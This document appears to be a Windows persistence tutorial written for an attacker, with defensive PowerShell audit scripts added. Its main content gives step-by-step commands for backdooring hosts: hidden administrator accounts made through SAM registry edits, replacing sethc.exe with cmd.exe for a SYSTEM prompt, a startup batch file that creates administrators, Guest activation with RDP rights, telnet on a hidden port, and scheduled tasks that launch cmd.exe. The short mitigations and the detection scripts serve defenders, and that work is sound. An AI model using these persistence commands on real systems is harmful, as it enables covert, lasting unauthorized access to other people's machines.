Windows Persistence Techniques for Maintaining Access
Hidden Accounts
One of the most common persistence methods involves creating hidden user accounts.
First, create a hidden account via command line:
net user attacker$ P@ssw0rd /add
This account won't appear in standard net user queries.
Next, grant it administrator privileges:
net localgroup administrators attacker$ /add
However, this account remains visible in the User Accounts panel. To fully hide it, modify the registry. Open regedit and navigate to HKEY_LOCAL_MACHINE\SAM\SAM. By default, this key appears empty with restricted access. Right-click to grant the administrator read/write permissions, then restart the registry editor.
Locate the newly created account and the administrator account within the registry structure. Identify their corresponding key types. Copy the F value from the administrator's registry entry to the hidden account's F value.
Export both the hidden account and its corresponding 0000003E9 directory to .reg files for backup.
Delete the visible account:
net user attacker$ /del
Re-import the previously exported registry files. The hidden account now becomes undetectable in the User Accounts interface.
For additional stealth, revoke the administrator's permissions on the registry key. When connecting via RDP (port 3389), authentication succeeds using the hidden credentials while displaying the administrator username.
Mitigation:
- Regularly audit user accounts and critical registry locations
- Enable account logon auditing via local security policy
Shift Backdoor
The shift backdoor exploits Windows sticky keys functionality. The sethc.exe binary activates after five consecutive shift key presses. By replacing it with cmd.exe, an attacker gains a high-privilege command prompt.
Prerequisites:
The sethc.exe file is owned by the TrustedInstaller account. Take ownership and adjust its permissions before replacing it (reference: system ownership configuration guides).
Implementation:
Navigate to C:\WINDOWS\system32 and execute:
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
This backs up the original sticky keys binary and substitutes it with the command interpreter.
Usage:
Press shift five times at the login screen or RDP interface to spawn a SYSTEM-privilege command prompt. From here, execute administrative operations:
net user backdoor$ Str0ngP@ss /add
net localgroup administrators backdoor$ /add
After establishing access, delete the temporary account to minimize detection.
Mitigation:
- Manually trigger sticky keys to verify the expected behavior
- Disable sticky keys via accessibility options or group policy
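An added example, not from the original page, that turns the first mitigation bullet into a repeatable check: it compares sethc.exe with cmd.exe byte for byte, reads the version resource (a copied cmd.exe still identifies itself as Cmd.Exe), runs sfc /verifyfile, and looks for the sethc.exe.bak left behind by the swap. It assumes an elevated Windows PowerShell 5.1 or later session.

```powershell
# Added example (not from the original page): check whether sethc.exe has been
# swapped for cmd.exe as described above. Run from an elevated PowerShell so
# sfc can verify the protected file.
$sys32 = Join-Path $env:SystemRoot 'System32'
$sethc = Join-Path $sys32 'sethc.exe'
$cmd   = Join-Path $sys32 'cmd.exe'

$sameAsCmd = (Get-FileHash -Algorithm SHA256 $sethc).Hash -eq (Get-FileHash -Algorithm SHA256 $cmd).Hash
$info      = (Get-Item $sethc).VersionInfo
# sfc emits UTF-16 when captured, so strip the embedded NUL characters before matching
$sfcOutput    = ((sfc "/verifyfile=$sethc") -join ' ') -replace "`0", ''
$sfcViolation = [bool]($sfcOutput -match 'found integrity violations')
$backupLeft   = Test-Path (Join-Path $sys32 'sethc.exe.bak')   # the rename in the walkthrough above

[pscustomobject]@{
    SameBytesAsCmd   = $sameAsCmd
    OriginalFilename = $info.OriginalFilename   # expected sethc.exe; a copied cmd.exe reports Cmd.Exe
    FileDescription  = $info.FileDescription
    SfcViolation     = $sfcViolation
    BackupLeftBehind = $backupLeft
    Suspicious       = $sameAsCmd -or $sfcViolation -or $backupLeft -or
                       ($info.OriginalFilename -notlike 'sethc*')
}
```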
Startup Folder Persistence
Configure automatic execution during system boot. Place executable scripts in the startup directory:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Create a batch file named startup.bat:
@echo off
net user startup_usr C0mplex!23 /add
net localgroup administrators startup_usr /add
Upon restart, the script executes automatically, creating a new administrator account.
Mitigation:
- Periodically inspect the startup folder for unauthorized scripts
- Monitor for unexpected account creation events
Group Policy Startup Scripts
Alternatively, deploy startup scripts through Group Policy Editor (gpedit.msc):
Navigate to Windows Settings → Scripts (Startup/Shutdown) and add the script to run at startup.
This approach offers better concealment compared to the startup folder method, as Group Policy startup scripts execute silently without user notification.
Mitigation:
- Regularly audit group policy startup scripts
- Review script contents for suspicious commands
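An added example, not from the original page, that covers the mitigation bullets of both the startup folder section and this Group Policy section: it enumerates the all-users Startup folder, every profile's Startup folder and the local machine GPO startup scripts (including entries registered in scripts.ini), then flags script files containing the account-creation commands shown in startup.bat above. It assumes the default C:\Users profile layout and an elevated session so other users' profiles are readable.

```powershell
# Added example (not from the original page): list the all-users and per-user
# Startup folders plus the local GPO machine startup scripts, flagging scripts
# that add or elevate accounts the way startup.bat above does. Run elevated
# to read other users' profiles and the GroupPolicy directory.
$pattern   = 'net\s+(user|localgroup)\b.*\s/add'   # the "net ... /add" lines shown above
$scriptExt = '.bat', '.cmd', '.ps1', '.vbs', '.js'
$gpoDir    = Join-Path $env:SystemRoot 'System32\GroupPolicy\Machine\Scripts'

$dirs = @(
    (Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp')
    (Join-Path $gpoDir 'Startup')
)
# Every profile under the profiles root (assumes the default C:\Users layout)
$dirs += Get-ChildItem -Directory (Split-Path $env:USERPROFILE) -ErrorAction SilentlyContinue |
    ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' }

# GPO startup scripts are registered in scripts.ini; a bare name is relative to the Startup folder
$ini = Join-Path $gpoDir 'scripts.ini'
$iniScripts = @(Get-Content $ini -ErrorAction SilentlyContinue | ForEach-Object {
    if ($_ -match '^\d+CmdLine=(.+)$') {
        if ([IO.Path]::IsPathRooted($Matches[1])) { $Matches[1] } else { Join-Path $gpoDir "Startup\$($Matches[1])" }
    }
})

$files = @(foreach ($d in $dirs | Where-Object { Test-Path $_ }) {
    Get-ChildItem -File -Force $d -ErrorAction SilentlyContinue
})
$files += @($iniScripts | Where-Object { Test-Path $_ } | Get-Item)

$findings = foreach ($f in $files | Sort-Object FullName -Unique) {
    $isScript = $f.Extension -in $scriptExt
    [pscustomobject]@{
        Path        = $f.FullName
        Modified    = $f.LastWriteTime
        IsScript    = $isScript
        AddsAccount = $isScript -and [bool](Select-String -Path $f.FullName -Pattern $pattern -Quiet)
    }
}
$findings | Sort-Object AddsAccount -Descending | Format-Table -AutoSize
```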
Guest Account Activation
Windows includes a disabled guest account. Activate it with administrative privileges and enable remote access:
net user Guest /active:yes
net user Guest G3st!Access
net localgroup Administrators Guest /ADD
Configure remote desktop permissions:
gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment → Allow log on through Remote Desktop Services
Add the Guest account to this policy.
Mitigation:
- Audit guest account status and permissions regularly
- Review remote desktop user rights assignments
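An added example, not from the original page, that implements the audit bullets for both the hidden accounts section and this guest account section in one pass: it lists every local account, marks names ending in "$" (which plain net user omits) and whether each one is in Administrators, and checks whether the built-in Guest (RID 501) is enabled with admin rights or the "Allow log on through Remote Desktop Services" right read from an exported security policy. It assumes a modern Windows build with the LocalAccounts cmdlets and secedit.exe, run from an elevated session.

```powershell
# Added example (not from the original page): audit local accounts for the two
# patterns described above: names ending in "$" (omitted from plain "net user"
# output) and an enabled Guest account holding admin or RDP rights. Run elevated.
$admins = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
    ForEach-Object { $_.Name })

# Names that plain "net user" prints: everything after the dashed separator line
$raw   = @(net user)
$start = ($raw | Select-String '^-{10,}' | Select-Object -First 1).LineNumber
$netUserNames = $raw[$start..($raw.Count - 1)] |
    Where-Object { $_ -and $_ -notmatch 'completed successfully' } |
    ForEach-Object { $_ -split '\s{2,}' } | Where-Object { $_ }

# Export the local security policy and read the RDP logon right
# (assumes secedit.exe, present on every supported Windows build)
$cfg = Join-Path $env:TEMP 'secpol_audit.inf'
secedit /export /cfg $cfg /quiet | Out-Null
$rdpRight = (Get-Content $cfg -ErrorAction SilentlyContinue |
    Where-Object { $_ -like 'SeRemoteInteractiveLogonRight*' } |
    Select-Object -First 1) -replace '^.*=\s*'
Remove-Item $cfg -ErrorAction SilentlyContinue

$findings = foreach ($u in Get-LocalUser) {
    $sid     = $u.SID.Value
    $isAdmin = $admins -contains "$env:COMPUTERNAME\$($u.Name)"
    $hasRdp  = [bool]($rdpRight -match [regex]::Escape($sid))
    $isGuest = $sid.EndsWith('-501')      # RID 501 is always the built-in Guest
    [pscustomobject]@{
        Name       = $u.Name
        Enabled    = $u.Enabled
        HiddenName = $u.Name.EndsWith('$')
        InNetUser  = $netUserNames -contains $u.Name
        IsAdmin    = $isAdmin
        RdpRight   = $hasRdp
        Suspicious = ($u.Enabled -and $u.Name.EndsWith('$')) -or
                     ($u.Enabled -and $isGuest -and ($isAdmin -or $hasRdp))
    }
}
$findings | Format-Table -AutoSize
```

Accounts that Get-LocalUser returns but net user does not list are exactly the "$"-suffixed ones this section describes; the registry F-value trick only hides them from the User Accounts panel, not from the SAM API.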
Telnet Service with Custom Port
Remote Desktop (RDP/3389) leaves obvious traces. Instead, configure the telnet service on a non-standard port for improved stealth.
Scenario: Target system at 192.168.1.132, attacker system at 192.168.1.3.
Step 1: Install the telnet server component on the target:
pkgmgr /iu:"TelnetServer"
Step 2: Start the telnet service:
net start tlntsvr
Step 3: Change the default port from 23 to a less obvious value (95 in this example):
tlntadmn config port=95
Restart the service for changes to take effect.
Step 4: Verify the configuration:
netstat -anp tcp | findstr 95
tlntadmn
Step 5: Enable telnet client on the attacker's system:
pkgmgr /iu:"TelnetClient"
Step 6: Connect to the target:
telnet 192.168.1.132 95
Step 7: Authenticate with valid credentials.
Step 8: Confirm the connection on the target system using network monitoring tools.
Mitigation:
- Regularly audit listening ports and running services
- Monitor for unauthorized telnet or non-standard service configurations
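An added example, not from the original page, that implements the two audit bullets above: it reports the tlntsvr service state, maps every listening TCP port to its owning process, and flags the telnet service when it listens on anything other than 23 (the port 95 case in the scenario), along with any listener not running from the Windows directory. It assumes Windows 8 / Server 2012 or later (for Get-NetTCPConnection) and an elevated session so service process paths resolve.

```powershell
# Added example (not from the original page): map listening TCP ports to their
# owning process and flag the telnet service (tlntsvr), in particular when it
# listens on something other than 23, as in the port 95 scenario above.
$svc = Get-Service -Name tlntsvr -ErrorAction SilentlyContinue
$svcStatus = if ($svc) { "$($svc.Status)" } else { 'not installed' }

$listeners = Get-NetTCPConnection -State Listen | ForEach-Object {
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Address  = $_.LocalAddress
        Port     = $_.LocalPort
        Pid      = $_.OwningProcess
        Process  = $proc.ProcessName
        Path     = $proc.Path
        IsTelnet = $proc.ProcessName -eq 'tlntsvr'
    }
}

$telnet = @($listeners | Where-Object IsTelnet)
[pscustomobject]@{
    TelnetService        = $svcStatus
    TelnetListeningPorts = ($telnet.Port | Sort-Object -Unique) -join ','
    TelnetOnNonStandard  = [bool]($telnet | Where-Object { $_.Port -ne 23 })
}

# Telnet on any port, plus anything listening from outside the Windows directory, deserves a look
$listeners | Where-Object { $_.IsTelnet -or ($_.Path -and $_.Path -notlike "$env:SystemRoot\*") } |
    Sort-Object Port | Format-Table -AutoSize
```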
Scheduled Tasks
Create persistent tasks that execute based on specific triggers:
schtasks /create /sc ONLOGON /mo modifier /tr C:\Windows\System32\cmd.exe /tn persistence_task
Command Reference:
| Parameter | Description |
|---|---|
| /create | Creates a new scheduled task |
| /sc <schedule> | Schedule type: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE |
| /mo <modifier> | Frequency within the schedule type |
| /tr <TaskRun> | Program or command to execute |
| /tn <TaskName> | Unique task identifier |
Common Configurations:
Run a task every minute:
schtasks /create /sc MINUTE /mo 1 /tn sys_monitor /tr "C:\Temp\monitor.exe"
Run a task every hour:
schtasks /create /sc HOURLY /mo 1 /tn sys_monitor /tr "C:\Temp\monitor.exe"
Run a task daily:
schtasks /create /sc DAILY /mo 1 /tn sys_monitor /tr "C:\Temp\monitor.exe"
Run a task weekly:
schtasks /create /sc WEEKLY /mo 1 /tn sys_monitor /tr "C:\Temp\monitor.exe"
Remove a scheduled task:
schtasks /Delete /TN task_name /F
Mitigation:
- Review scheduled tasks periodically for suspicious entries
- Monitor the %SystemRoot%\System32\Tasks directory for unauthorized task definitions
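An added example, not from the original page, that implements both mitigation bullets above: it enumerates every registered task with its triggers and actions, flags the action patterns shown in this section (cmd.exe as the program, or a binary under Temp or a user profile), and then compares the task definition files in %SystemRoot%\System32\Tasks with what the Task Scheduler reports, since a definition on disk with no registered task is worth explaining. It assumes Windows 8 / Server 2012 or later (for Get-ScheduledTask) and an elevated session.

```powershell
# Added example (not from the original page): enumerate registered tasks with
# their triggers and actions, flag the patterns from the commands above (cmd.exe
# or a program under Temp or a user profile as the action), and cross-check the
# Tasks directory for definition files without a registered task. Run elevated.
$tasksDir   = Join-Path $env:SystemRoot 'System32\Tasks'
$registered = Get-ScheduledTask

$findings = foreach ($t in $registered) {
    # Trigger class names such as MSFT_TaskLogonTrigger become Logon, Boot, Daily, ...
    $triggers = ($t.Triggers | ForEach-Object {
        $_.CimClass.CimClassName -replace '^MSFT_Task', '' -replace 'Trigger$', ''
    }) -join ','
    foreach ($a in $t.Actions) {
        $exe = "$($a.Execute)".Trim('"')
        [pscustomobject]@{
            Task       = $t.TaskPath + $t.TaskName
            State      = $t.State
            Triggers   = $triggers
            Execute    = $exe
            Arguments  = $a.Arguments
            RunAs      = $t.Principal.UserId
            Suspicious = [bool]($exe -match '(^|\\)(cmd|powershell)(\.exe)?$|\\Temp\\|\\Users\\')
        }
    }
}

# Task XML files that exist on disk but have no registered counterpart
$known   = @($registered | ForEach-Object { ($_.TaskPath + $_.TaskName).TrimStart('\') })
$onDisk  = Get-ChildItem -File -Recurse $tasksDir -ErrorAction SilentlyContinue |
    ForEach-Object { $_.FullName.Substring($tasksDir.Length + 1) }
$orphans = @($onDisk | Where-Object { $known -notcontains $_ })

$findings | Where-Object Suspicious | Format-Table Task, Triggers, Execute, Arguments, RunAs -AutoSize
"Task files on disk without a registered task: $($orphans.Count)"
$orphans
```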